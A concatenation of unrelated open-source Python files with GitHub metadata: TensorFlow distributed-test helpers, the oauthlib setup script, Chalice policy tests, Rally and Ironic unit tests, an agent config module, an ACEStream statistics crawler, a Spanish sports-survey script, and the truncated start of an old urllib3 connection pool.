# 2) there is something global in CUDA such that if we initialize CUDA in the
# parent process, the child process cannot initialize it again and thus cannot
# use GPUs (https://stackoverflow.com/questions/22950047).
return _create_cluster(
num_workers,
num_ps=num_ps,
has_chief=has_chief,
has_eval=has_eval,
worker_config=worker_config,
ps_config=ps_config,
protocol='grpc')
def create_cluster_spec(has_chief=False,
num_workers=1,
num_ps=0,
has_eval=False):
"""Create a cluster spec with tasks with unused local ports."""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
cluster_spec = {}
if has_chief:
cluster_spec['chief'] = ['localhost:%s' % pick_unused_port()]
if num_workers:
cluster_spec['worker'] = [
'localhost:%s' % pick_unused_port() for _ in range(num_workers)
]
if num_ps:
cluster_spec['ps'] = [
'localhost:%s' % pick_unused_port() for _ in range(num_ps)
]
if has_eval:
cluster_spec['evaluator'] = ['localhost:%s' % pick_unused_port()]
return cluster_spec
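# Illustrative example of the dicts produced above (the ports are placeholders
# chosen by pick_unused_port() at run time):
#
#   create_cluster_spec(has_chief=True, num_workers=2)
#   # -> {'chief': ['localhost:12345'],
#   #     'worker': ['localhost:12346', 'localhost:12347']}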
class MultiWorkerTestBase(test.TestCase):
"""Base class for testing multi node strategy and dataset."""
@classmethod
def setUpClass(cls):
"""Create a local cluster with 2 workers."""
cls._cluster_spec = create_in_process_cluster(num_workers=2, num_ps=0)
cls._default_target = 'grpc://' + cls._cluster_spec['worker'][0]
def setUp(self):
# We only cache the session in one test because another test may have a
# different session config or master target.
self._thread_local = threading.local()
self._thread_local.cached_session = None
self._result = 0
self._lock = threading.Lock()
@contextlib.contextmanager
def session(self, graph=None, config=None, target=None):
"""Create a test session with master target set to the testing cluster.
Creates a test session that connects to the local testing cluster.
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
target: the target of session to connect to.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
config = self._create_config(config)
if target is None:
target = self._default_target
with session.Session(graph=graph, config=config, target=target) as sess:
yield sess
@contextlib.contextmanager
# TODO(b/117573461): Overwrite self.evaluate() to use this function.
def cached_session(self, graph=None, config=None, target=None):
"""Create a test session with master target set to the testing cluster.
Creates a test session that connects to the local testing cluster.
The session is only created once per test and then reused.
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
target: the target of session to connect to.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case. Note that the
session will live until the end of the test.
"""
config = self._create_config(config)
if target is None:
target = self._default_target
if getattr(self._thread_local, 'cached_session', None) is None:
self._thread_local.cached_session = session.Session(
graph=None, config=config, target=target)
sess = self._thread_local.cached_session
with sess.graph.as_default(), sess.as_default():
yield sess
def _create_config(self, config):
if config is None:
config = config_pb2.ConfigProto(allow_soft_placement=True)
else:
config = copy.deepcopy(config)
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
def _run_client(self, client_fn, task_type, task_id, num_gpus, *args,
**kwargs):
result = client_fn(task_type, task_id, num_gpus, *args, **kwargs)
if np.all(result):
with self._lock:
self._result += 1
def _run_between_graph_clients(self, client_fn, cluster_spec, num_gpus, *args,
**kwargs):
"""Runs several clients for between-graph replication.
Args:
client_fn: a function that needs to accept `task_type`, `task_id`,
`num_gpus` and returns True if it succeeds.
cluster_spec: a dict specifying jobs in a cluster.
num_gpus: number of GPUs per worker.
*args: will be passed to `client_fn`.
**kwargs: will be passed to `client_fn`.
"""
threads = []
for task_type in [run_config.TaskType.CHIEF, run_config.TaskType.WORKER]:
for task_id in range(len(cluster_spec.get(task_type, []))):
t = threading.Thread(
target=self._run_client,
args=(client_fn, task_type, task_id, num_gpus) + args,
kwargs=kwargs)
t.start()
threads.append(t)
for t in threads:
t.join()
self.assertEqual(self._result, len(threads))
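# Illustrative usage sketch: a test built on MultiWorkerTestBase subclasses it
# and opens sessions against the in-process cluster created in setUpClass.
# The test name and graph are only examples.
#
#   class MyDistributedTest(MultiWorkerTestBase):
#
#     def test_simple_graph(self):
#       with self.cached_session() as sess:
#         # Build a graph here and run it against self._default_target.
#         pass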
|
{
"content_hash": "9714e6e86ae612e2a5e0c7db82aa3d22",
"timestamp": "",
"source": "github",
"line_count": 291,
"max_line_length": 80,
"avg_line_length": 34.13745704467354,
"alnum_prop": 0.6550231528085363,
"repo_name": "hehongliang/tensorflow",
"id": "8eec3dc0f6ec0676353c7434d203e017b9aab80d",
"size": "10623",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tensorflow/contrib/distribute/python/multi_worker_test_base.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "7666"
},
{
"name": "C",
"bytes": "194748"
},
{
"name": "C++",
"bytes": "26947133"
},
{
"name": "CMake",
"bytes": "174938"
},
{
"name": "Go",
"bytes": "908627"
},
{
"name": "Java",
"bytes": "323804"
},
{
"name": "Jupyter Notebook",
"bytes": "1833659"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "37293"
},
{
"name": "Objective-C",
"bytes": "7056"
},
{
"name": "Objective-C++",
"bytes": "63210"
},
{
"name": "Protocol Buffer",
"bytes": "249901"
},
{
"name": "PureBasic",
"bytes": "24932"
},
{
"name": "Python",
"bytes": "22872386"
},
{
"name": "Ruby",
"bytes": "327"
},
{
"name": "Shell",
"bytes": "336334"
}
],
"symlink_target": ""
}
|
import os
import sys
from os.path import dirname, join
from setuptools import setup, find_packages, Command
# Hack because logging + setuptools sucks.
import multiprocessing
def fread(fn):
with open(join(dirname(__file__), fn), 'r') as f:
return f.read()
if sys.version_info[0] == 3:
tests_require = ['nose', 'pycrypto']
else:
tests_require = ['nose', 'unittest2', 'pycrypto']
rsa_require = ['pycrypto']
requires = []
setup(
name='oauthlib',
version='0.3.0',
description='A generic, spec-compliant, thorough implementation of the OAuth request-signing logic',
long_description=fread('README.rst'),
author='Idan Gazit',
author_email='idan@gazit.me',
url='https://github.com/idan/oauthlib',
license=fread('LICENSE'),
    packages=find_packages(exclude=('docs',)),
test_suite='nose.collector',
tests_require=tests_require,
extras_require={'test': tests_require, 'rsa': rsa_require},
install_requires=requires,
)
|
{
"content_hash": "97d717420fe9d80d2ddb717f6850fb02",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 104,
"avg_line_length": 26.56756756756757,
"alnum_prop": 0.6744659206510681,
"repo_name": "gautamk/oauthlib",
"id": "f9013c029a78cedaa1dd393672e361cd8a347d75",
"size": "1008",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "207964"
}
],
"symlink_target": ""
}
|
from chalice.config import Config
from chalice.policy import PolicyBuilder, AppPolicyGenerator
from chalice.policy import diff_policies
from chalice.utils import OSUtils # noqa
class OsUtilsMock(OSUtils):
def file_exists(self, *args, **kwargs):
return True
    def get_file_contents(self, *args, **kwargs):
return ''
def iam_policy(client_calls):
builder = PolicyBuilder()
policy = builder.build_policy_from_api_calls(client_calls)
return policy
def test_app_policy_generator_vpc_policy():
config = Config.create(
subnet_ids=['sn1', 'sn2'],
security_group_ids=['sg1', 'sg2'],
project_dir='.'
)
generator = AppPolicyGenerator(OsUtilsMock())
policy = generator.generate_policy(config)
assert policy == {'Statement': [
{'Action': ['logs:CreateLogGroup',
'logs:CreateLogStream',
'logs:PutLogEvents'],
'Effect': 'Allow',
'Resource': 'arn:aws:logs:*:*:*'},
{'Action': ['ec2:CreateNetworkInterface',
'ec2:DescribeNetworkInterfaces',
'ec2:DetachNetworkInterface',
'ec2:DeleteNetworkInterface'],
'Effect': 'Allow',
'Resource': '*'},
], 'Version': '2012-10-17'}
def assert_policy_is(actual, expected):
    # Prune out the auto-generated fields (such as Sid) that we don't
    # care about.
statements = actual['Statement']
for s in statements:
del s['Sid']
assert expected == statements
def test_single_call():
assert_policy_is(iam_policy({'dynamodb': set(['list_tables'])}), [{
'Effect': 'Allow',
'Action': [
'dynamodb:ListTables'
],
'Resource': [
'*',
]
}])
def test_multiple_calls_in_same_service():
expected_policy = [{
'Effect': 'Allow',
'Action': [
'dynamodb:DescribeTable',
'dynamodb:ListTables',
],
'Resource': [
'*',
]
}]
assert_policy_is(
iam_policy({'dynamodb': set(['list_tables', 'describe_table'])}),
expected_policy
)
def test_multiple_services_used():
client_calls = {
'dynamodb': set(['list_tables']),
'cloudformation': set(['create_stack']),
}
assert_policy_is(iam_policy(client_calls), [
{
'Effect': 'Allow',
'Action': [
'cloudformation:CreateStack',
],
'Resource': [
'*',
]
},
{
'Effect': 'Allow',
'Action': [
'dynamodb:ListTables',
],
'Resource': [
'*',
]
},
])
def test_not_one_to_one_mapping():
client_calls = {
's3': set(['list_buckets', 'list_objects',
'create_multipart_upload']),
}
assert_policy_is(iam_policy(client_calls), [
{
'Effect': 'Allow',
'Action': [
's3:ListAllMyBuckets',
's3:ListBucket',
's3:PutObject',
],
'Resource': [
'*',
]
},
])
def test_can_diff_policy_removed():
first = iam_policy({'s3': {'list_buckets', 'list_objects'}})
second = iam_policy({'s3': {'list_buckets'}})
assert diff_policies(first, second) == {'removed': {'s3:ListBucket'}}
def test_can_diff_policy_added():
first = iam_policy({'s3': {'list_buckets'}})
second = iam_policy({'s3': {'list_buckets', 'list_objects'}})
assert diff_policies(first, second) == {'added': {'s3:ListBucket'}}
def test_can_diff_multiple_services():
first = iam_policy({
's3': {'list_buckets'},
'dynamodb': {'create_table'},
'cloudformation': {'create_stack', 'delete_stack'},
})
second = iam_policy({
's3': {'list_buckets', 'list_objects'},
'cloudformation': {'create_stack', 'update_stack'},
})
assert diff_policies(first, second) == {
'added': {'s3:ListBucket', 'cloudformation:UpdateStack'},
'removed': {'cloudformation:DeleteStack', 'dynamodb:CreateTable'},
}
def test_no_changes():
first = iam_policy({'s3': {'list_buckets', 'list_objects'}})
second = iam_policy({'s3': {'list_buckets', 'list_objects'}})
assert diff_policies(first, second) == {}
def test_can_handle_high_level_abstractions():
policy = iam_policy({
's3': set(['download_file', 'upload_file', 'copy'])
})
assert_policy_is(policy, [{
'Effect': 'Allow',
'Action': [
's3:AbortMultipartUpload',
's3:GetObject',
's3:PutObject',
],
'Resource': [
'*',
]
}])
def test_noop_for_unknown_methods():
assert_policy_is(iam_policy({'s3': set(['unknown_method'])}), [])
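# Illustrative usage sketch: the same builder can be driven directly, outside
# of the assertions above.
#
#   builder = PolicyBuilder()
#   policy = builder.build_policy_from_api_calls({'dynamodb': {'list_tables'}})
#   # policy now contains an Allow statement for 'dynamodb:ListTables'
#   # on resource '*', as exercised by test_single_call above.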
|
{
"content_hash": "08ecdbafaa56732813acbce50ac5015d",
"timestamp": "",
"source": "github",
"line_count": 181,
"max_line_length": 74,
"avg_line_length": 27.07734806629834,
"alnum_prop": 0.5207100591715976,
"repo_name": "awslabs/chalice",
"id": "b0c3d54f15e7edb2573c94ba7dd16cfb2d651e2c",
"size": "4901",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/unit/test_policy.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "1407"
},
{
"name": "Python",
"bytes": "588372"
}
],
"symlink_target": ""
}
|
from rally import consts
from rally import objects
from tests.unit import test
class EndpointTestCase(test.TestCase):
def test_to_dict(self):
endpoint = objects.Endpoint("foo_url", "foo_user", "foo_password",
tenant_name="foo_tenant",
permission=consts.EndpointPermission.ADMIN)
self.assertEqual(endpoint.to_dict(),
{"auth_url": "foo_url",
"username": "foo_user",
"password": "foo_password",
"tenant_name": "foo_tenant",
"region_name": None,
"domain_name": None,
"endpoint": None,
"endpoint_type": consts.EndpointType.PUBLIC,
"https_insecure": None,
"https_cacert": None,
"project_domain_name": "Default",
"user_domain_name": "Default",
"admin_domain_name": "Default"})
def test_to_dict_with_include_permission(self):
endpoint = objects.Endpoint("foo_url", "foo_user", "foo_password",
tenant_name="foo_tenant",
permission=consts.EndpointPermission.ADMIN)
self.assertEqual(endpoint.to_dict(include_permission=True),
{"auth_url": "foo_url",
"username": "foo_user",
"password": "foo_password",
"tenant_name": "foo_tenant",
"region_name": None,
"domain_name": None,
"endpoint": None,
"permission": consts.EndpointPermission.ADMIN,
"endpoint_type": consts.EndpointType.PUBLIC,
"https_insecure": None,
"https_cacert": None,
"project_domain_name": "Default",
"user_domain_name": "Default",
"admin_domain_name": "Default"})
def test_to_dict_with_kwarg_endpoint(self):
endpoint = objects.Endpoint("foo_url", "foo_user", "foo_password",
tenant_name="foo_tenant",
permission=consts.EndpointPermission.ADMIN,
endpoint="foo_endpoint")
self.assertEqual(endpoint.to_dict(),
{"auth_url": "foo_url",
"username": "foo_user",
"password": "foo_password",
"tenant_name": "foo_tenant",
"region_name": None,
"domain_name": None,
"endpoint": "foo_endpoint",
"endpoint_type": consts.EndpointType.PUBLIC,
"https_insecure": None,
"https_cacert": None,
"project_domain_name": "Default",
"user_domain_name": "Default",
"admin_domain_name": "Default"})
|
{
"content_hash": "9514b5429c11e4df6ecc68d5e88cdf66",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 79,
"avg_line_length": 50.41538461538462,
"alnum_prop": 0.42691486115349403,
"repo_name": "shdowofdeath/rally",
"id": "b2c929baee58b6885976339453001b199a6b0997",
"size": "3907",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tests/unit/objects/test_endpoint.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "46737"
},
{
"name": "Python",
"bytes": "2421750"
},
{
"name": "Shell",
"bytes": "36795"
}
],
"symlink_target": ""
}
|
"""
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
This file is part of the Smart Developer Hub Project:
http://www.smartdeveloperhub.org
Center for Open Middleware
http://www.centeropenmiddleware.com/
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
Copyright (C) 2015 Center for Open Middleware.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
"""
import logging
import uuid
import os
__author__ = 'Fernando Serena'
def _api_port():
return int(os.environ.get('API_PORT', 5007))
def _agent_id():
aid = os.environ.get('AGENT_ID')
if not aid:
try:
with file('.AGENT_ID', mode='r') as f:
aid = f.readline()
except IOError:
pass
if not aid:
aid = str(uuid.uuid4())
with file('.AGENT_ID', mode='w') as f:
f.write(aid)
return aid
def _redis_conf(def_host, def_port, def_db):
return {'host': os.environ.get('DB_HOST', def_host),
'db': int(os.environ.get('DB_DB', def_db)),
'port': int(os.environ.get('DB_PORT', def_port))}
def _mongo_conf(def_host, def_port, def_db):
return {'host': os.environ.get('MONGO_HOST', def_host),
'db': os.environ.get('MONGO_DB', def_db),
'port': int(os.environ.get('MONGO_PORT', def_port))}
def _agora_conf(def_host, def_port):
return {'host': os.environ.get('AGORA_HOST', def_host),
'port': int(os.environ.get('AGORA_PORT', def_port))}
def _broker_conf(def_host, def_port):
return {'host': os.environ.get('AMQP_HOST', def_host),
'port': int(os.environ.get('AMQP_PORT', def_port))}
def _exchange_conf(def_exchange, def_queue, def_tp, def_response_rk):
return {
'exchange': os.environ.get('EXCHANGE_NAME', def_exchange),
'queue': os.environ.get('QUEUE_NAME', def_queue),
'topic_pattern': os.environ.get('TOPIC_PATTERN', def_tp),
'response_rk': os.environ.get('RESPONSE_RK_PREFIX', def_response_rk)
}
def _behaviour_conf(def_pass_threshold):
return {
'pass_threshold': float(os.environ.get('PASS_THRESHOLD', def_pass_threshold))
}
def _cache_conf(def_graph_throttling, def_min_cache_time):
return {
'graph_throttling': float(os.environ.get('GRAPH_THROTTLING', def_graph_throttling)),
'min_cache_time': float(os.environ.get('MIN_CACHE_TIME', def_min_cache_time))
}
def _logging_conf(def_level):
return int(os.environ.get('LOG_LEVEL', def_level))
class Config(object):
PORT = _api_port()
REDIS = _redis_conf('localhost', 6379, 4)
MONGO = _mongo_conf('localhost', 27017, 'scholar')
AGORA = _agora_conf('localhost', 9002)
BROKER = _broker_conf('localhost', 5672)
EXCHANGE = _exchange_conf('stoa', 'stoa_requests', 'stoa.request.*', 'stoa.response')
BEHAVIOUR = _behaviour_conf(0.1)
CACHE = _cache_conf(20, 60)
ID = _agent_id()
class DevelopmentConfig(Config):
DEBUG = True
LOG = logging.DEBUG
class TestingConfig(Config):
DEBUG = False
LOG = logging.DEBUG
TESTING = True
class ProductionConfig(Config):
DEBUG = False
LOG = _logging_conf(logging.INFO)
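# Illustrative example: every helper above reads environment variables first
# and falls back to the given defaults, so the settings can be tuned without
# editing this file. With DB_HOST=redis.local exported and DB_PORT/DB_DB
# unset:
#
#   _redis_conf('localhost', 6379, 4)
#   # -> {'host': 'redis.local', 'port': 6379, 'db': 4}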
|
{
"content_hash": "072812b6be05658a0b44ab7fd239dba9",
"timestamp": "",
"source": "github",
"line_count": 124,
"max_line_length": 92,
"avg_line_length": 31.193548387096776,
"alnum_prop": 0.5855739400206825,
"repo_name": "fserena/agora-stoa",
"id": "4ded2bfd5eadc82bda23b4ee5611f9f725eddcae",
"size": "3868",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "agora/stoa/server/config.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "121135"
}
],
"symlink_target": ""
}
|
from oslo_utils import uuidutils
from ironic.common import network
from ironic.conductor import task_manager
from ironic.tests.unit.conductor import mgr_utils
from ironic.tests.unit.db import base as db_base
from ironic.tests.unit.db import utils as db_utils
from ironic.tests.unit.objects import utils as object_utils
class TestNetwork(db_base.DbTestCase):
def setUp(self):
super(TestNetwork, self).setUp()
mgr_utils.mock_the_extension_manager(driver='fake')
self.node = object_utils.create_test_node(self.context)
def test_get_node_vif_ids_no_ports_no_portgroups(self):
expected = {'portgroups': {},
'ports': {}}
with task_manager.acquire(self.context, self.node.uuid) as task:
result = network.get_node_vif_ids(task)
self.assertEqual(expected, result)
def test_get_node_vif_ids_one_port(self):
port1 = db_utils.create_test_port(node_id=self.node.id,
address='aa:bb:cc:dd:ee:ff',
uuid=uuidutils.generate_uuid(),
extra={'vif_port_id': 'test-vif-A'},
driver='fake')
expected = {'portgroups': {},
'ports': {port1.uuid: 'test-vif-A'}}
with task_manager.acquire(self.context, self.node.uuid) as task:
result = network.get_node_vif_ids(task)
self.assertEqual(expected, result)
def test_get_node_vif_ids_one_portgroup(self):
pg1 = db_utils.create_test_portgroup(
node_id=self.node.id,
extra={'vif_port_id': 'test-vif-A'})
expected = {'portgroups': {pg1.uuid: 'test-vif-A'},
'ports': {}}
with task_manager.acquire(self.context, self.node.uuid) as task:
result = network.get_node_vif_ids(task)
self.assertEqual(expected, result)
def test_get_node_vif_ids_two_ports(self):
port1 = db_utils.create_test_port(node_id=self.node.id,
address='aa:bb:cc:dd:ee:ff',
uuid=uuidutils.generate_uuid(),
extra={'vif_port_id': 'test-vif-A'},
driver='fake')
port2 = db_utils.create_test_port(node_id=self.node.id,
address='dd:ee:ff:aa:bb:cc',
uuid=uuidutils.generate_uuid(),
extra={'vif_port_id': 'test-vif-B'},
driver='fake')
expected = {'portgroups': {},
'ports': {port1.uuid: 'test-vif-A',
port2.uuid: 'test-vif-B'}}
with task_manager.acquire(self.context, self.node.uuid) as task:
result = network.get_node_vif_ids(task)
self.assertEqual(expected, result)
def test_get_node_vif_ids_two_portgroups(self):
pg1 = db_utils.create_test_portgroup(
node_id=self.node.id,
extra={'vif_port_id': 'test-vif-A'})
pg2 = db_utils.create_test_portgroup(
uuid=uuidutils.generate_uuid(),
address='dd:ee:ff:aa:bb:cc',
node_id=self.node.id,
name='barname',
extra={'vif_port_id': 'test-vif-B'})
expected = {'portgroups': {pg1.uuid: 'test-vif-A',
pg2.uuid: 'test-vif-B'},
'ports': {}}
with task_manager.acquire(self.context, self.node.uuid) as task:
result = network.get_node_vif_ids(task)
self.assertEqual(expected, result)
|
{
"content_hash": "280133561a917e9b26b33f2d6c0074f9",
"timestamp": "",
"source": "github",
"line_count": 81,
"max_line_length": 78,
"avg_line_length": 46.25925925925926,
"alnum_prop": 0.525487056311716,
"repo_name": "devananda/ironic",
"id": "8a318f2b86357840a99af78eaee20c03c9b34b44",
"size": "4376",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "ironic/tests/unit/common/test_network.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "3354566"
}
],
"symlink_target": ""
}
|
import sys
import cPickle
from time import strftime
from ACEStream.Core.Overlay.SecureOverlay import OLPROTO_VER_FIFTEENTH
from ACEStream.Core.BitTornado.BT1.MessageID import CRAWLER_USEREVENTLOG_QUERY
from ACEStream.Core.CacheDB.sqlitecachedb import SQLiteCacheDB
from ACEStream.Core.Utilities.utilities import show_permid, show_permid_short
from ACEStream.Core.Statistics.Crawler import Crawler
DEBUG = False
class UserEventLogCrawler:
__single = None
@classmethod
def get_instance(cls, *args, **kargs):
if not cls.__single:
cls.__single = cls(*args, **kargs)
return cls.__single
def __init__(self):
self._sqlite_cache_db = SQLiteCacheDB.getInstance()
crawler = Crawler.get_instance()
if crawler.am_crawler():
msg = '# Crawler started'
self.__log(msg)
def query_initiator(self, permid, selversion, request_callback):
if DEBUG:
print >> sys.stderr, 'usereventlogcrawler: query_initiator', show_permid_short(permid)
if selversion >= OLPROTO_VER_FIFTEENTH:
sql = 'SELECT * FROM UserEventLog; DELETE FROM UserEventLog;'
request_callback(CRAWLER_USEREVENTLOG_QUERY, sql, callback=self._after_request_callback)
def _after_request_callback(self, exc, permid):
if not exc:
if DEBUG:
print >> sys.stderr, 'usereventlogcrawler: request send to', show_permid_short(permid)
msg = '; '.join(['REQUEST', show_permid(permid)])
self.__log(msg)
def handle_crawler_request(self, permid, selversion, channel_id, message, reply_callback):
if DEBUG:
print >> sys.stderr, 'usereventlogcrawler: handle_crawler_request', show_permid_short(permid), message
try:
cursor = self._sqlite_cache_db.execute_read(message)
except Exception as e:
reply_callback(str(e), error=1)
else:
if cursor:
reply_callback(cPickle.dumps(list(cursor), 2))
else:
reply_callback('error', error=2)
def handle_crawler_reply(self, permid, selversion, channel_id, channel_data, error, message, request_callback):
if error:
if DEBUG:
print >> sys.stderr, 'usereventlogcrawler: handle_crawler_reply', error, message
msg = '; '.join(['REPLY',
show_permid(permid),
str(error),
str(message)])
self.__log(msg)
else:
if DEBUG:
print >> sys.stderr, 'usereventlogcrawler: handle_crawler_reply', show_permid_short(permid), cPickle.loads(message)
msg = '; '.join(['REPLY',
show_permid(permid),
str(error),
str(cPickle.loads(message))])
self.__log(msg)
def __log(self, message):
file = open('usereventlogcrawler' + strftime('%Y-%m-%d') + '.txt', 'a')
print >> file, strftime('%Y/%m/%d %H:%M:%S'), message
file.close()
|
{
"content_hash": "ab1cf148acb7ba52d1f1760b1ef4816f",
"timestamp": "",
"source": "github",
"line_count": 75,
"max_line_length": 131,
"avg_line_length": 40.44,
"alnum_prop": 0.6079788987800857,
"repo_name": "aplicatii-romanesti/allinclusive-kodi-pi",
"id": "390e611b6241e13656d449ee66625bbc2546fdb2",
"size": "3104",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": ".kodi/userdata/addon_data/plugin.video.p2p-streams/acestream/ace/ACEStream/Core/Statistics/UserEventLogCrawler.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Perl",
"bytes": "6178"
},
{
"name": "Python",
"bytes": "8657978"
},
{
"name": "Shell",
"bytes": "198"
}
],
"symlink_target": ""
}
|
import msvcrt
# start
titulo="Encuesta Deportes\n".capitalize()
print titulo.center(50," ")
entrada= "Clasificacion de deportes que practican las personas\n"
print entrada.upper()
#-------------------------------------------------------------------------------
# question loop
pregunta=0
c1=1
ajedrez=0
atletismo=0
futbol=0
baloncesto=0
karate=0
natacion=0
volleyball=0
flag=0
pingpong=0
otros=0
while pregunta < 10:
pregunta=pregunta+1
print ("\n?Que deporte usted practica de la siguiente lista?\n ")
print"1) Ajedrez"
print'2) Atletismo'
print'3) Baloncesto '
print"4) Futbol"
print"5) Karate "
print"6) Natacion"
print"7) Volleyball"
print"8) Flag"
print"9) Ping Pong"
print"10) otros"
opcion = int(raw_input('elija opcion: '))
if opcion == 1:
ajedrez=ajedrez+1
print "\najedrez"
elif opcion == 2:
atletismo=atletismo+1
print "\natletismo"
elif opcion == 3:
baloncesto=baloncesto+1
print "\nbaloncesto"
elif opcion == 4:
futbol=futbol+1
print "\nfutbol"
elif opcion == 5:
karate=karate+1
print "\nkarate"
elif opcion == 6:
natacion=natacion+1
print "\nnatacion"
elif opcion == 7:
volleyball=volleyball+1
print "\nvolleybol"
elif opcion == 8:
flag=flag+1
print "\nflag"
elif opcion == 9:
pingpong=pingpong+1
print "\nping pong"
elif opcion==10:
otros=otros+1
print"\notros"
else:
print"\nelija opciones establecidas"
if pregunta >=10:
break
print("\nEl total de encuestado de los diferentes deportes son:\n")
print("ajedrez",ajedrez)
print("atletismo:",atletismo)
print("baloncesto:",baloncesto)
print("futbol:",futbol)
print("karate:",karate)
print("natacion:",natacion)
print("volleyball:",volleyball)
print("flag:",flag)
print("pingpong",pingpong)
print("otros",otros)
msvcrt.getch()
|
{
"content_hash": "59bb5fa4d750d6e7915f1b2af6ca7765",
"timestamp": "",
"source": "github",
"line_count": 111,
"max_line_length": 80,
"avg_line_length": 18.117117117117118,
"alnum_prop": 0.599204375932372,
"repo_name": "rubbenrc/uip-prog3",
"id": "cbff876e5df80b212b146c0b7eb0f64595430f44",
"size": "2827",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tarea/tarea#6 encuesta mejorada.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "23644"
}
],
"symlink_target": ""
}
|
import logging
import socket
from httplib import HTTPConnection, HTTPSConnection, HTTPException
from Queue import Queue, Empty, Full
from select import select
from socket import error as SocketError, timeout as SocketTimeout
from .packages.ssl_match_hostname import match_hostname, CertificateError
try:
import ssl
BaseSSLError = ssl.SSLError
except ImportError:
ssl = None
BaseSSLError = None
from .request import RequestMethods
from .response import HTTPResponse
from .exceptions import (
SSLError,
MaxRetryError,
TimeoutError,
HostChangedError,
EmptyPoolError,
)
log = logging.getLogger(__name__)
_Default = object()
## Connection objects (extension of httplib)
class VerifiedHTTPSConnection(HTTPSConnection):
"""
Based on httplib.HTTPSConnection but wraps the socket with
SSL certification.
"""
cert_reqs = None
ca_certs = None
def set_cert(self, key_file=None, cert_file=None,
cert_reqs='CERT_NONE', ca_certs=None):
ssl_req_scheme = {
'CERT_NONE': ssl.CERT_NONE,
'CERT_OPTIONAL': ssl.CERT_OPTIONAL,
'CERT_REQUIRED': ssl.CERT_REQUIRED
}
self.key_file = key_file
self.cert_file = cert_file
self.cert_reqs = ssl_req_scheme.get(cert_reqs) or ssl.CERT_NONE
self.ca_certs = ca_certs
def connect(self):
# Add certificate verification
sock = socket.create_connection((self.host, self.port), self.timeout)
# Wrap socket using verification with the root certs in
# trusted_root_certs
self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file,
cert_reqs=self.cert_reqs,
ca_certs=self.ca_certs)
if self.ca_certs:
match_hostname(self.sock.getpeercert(), self.host)
## Pool objects
class ConnectionPool(object):
"""
Base class for all connection pools, such as
:class:`.HTTPConnectionPool` and :class:`.HTTPSConnectionPool`.
"""
pass
class HTTPConnectionPool(ConnectionPool, RequestMethods):
"""
Thread-safe connection pool for one host.
:param host:
Host used for this HTTP Connection (e.g. "localhost"), passed into
:class:`httplib.HTTPConnection`.
:param port:
Port used for this HTTP Connection (None is equivalent to 80), passed
into :class:`httplib.HTTPConnection`.
:param strict:
Causes BadStatusLine to be raised if the status line can't be parsed
as a valid HTTP/1.0 or 1.1 status line, passed into
:class:`httplib.HTTPConnection`.
:param timeout:
Socket timeout for each individual connection, can be a float. None
disables timeout.
:param maxsize:
Number of connections to save that can be reused. More than 1 is useful
in multithreaded situations. If ``block`` is set to false, more
connections will be created but they will not be saved once they've
been used.
:param block:
If set to True, no more than ``maxsize`` connections will be used at
a time. When no free connections are available, the call will block
until a connection has been released. This is a useful side effect for
particular multithreaded situations where one does not want to use more
than maxsize connections per host to prevent flooding.
:param headers:
Headers to include with all requests, unless other headers are given
explicitly.
"""
scheme = 'http'
def __init__(self, host, port=None, strict=False, timeout=None, maxsize=1,
block=False, headers=None):
self.host = host
self.port = port
self.strict = strict
self.timeout = timeout
self.pool = Queue(maxsize)
self.block = block
self.headers = headers or {}
# Fill the queue up so that doing get() on it will block properly
for _ in xrange(maxsize):
self.pool.put(None)
# These are mostly for testing and debugging purposes.
self.num_connections = 0
self.num_requests = 0
def _new_conn(self):
"""
Return a fresh :class:`httplib.HTTPConnection`.
"""
self.num_connections += 1
log.info("Starting new HTTP connection (%d): %s" %
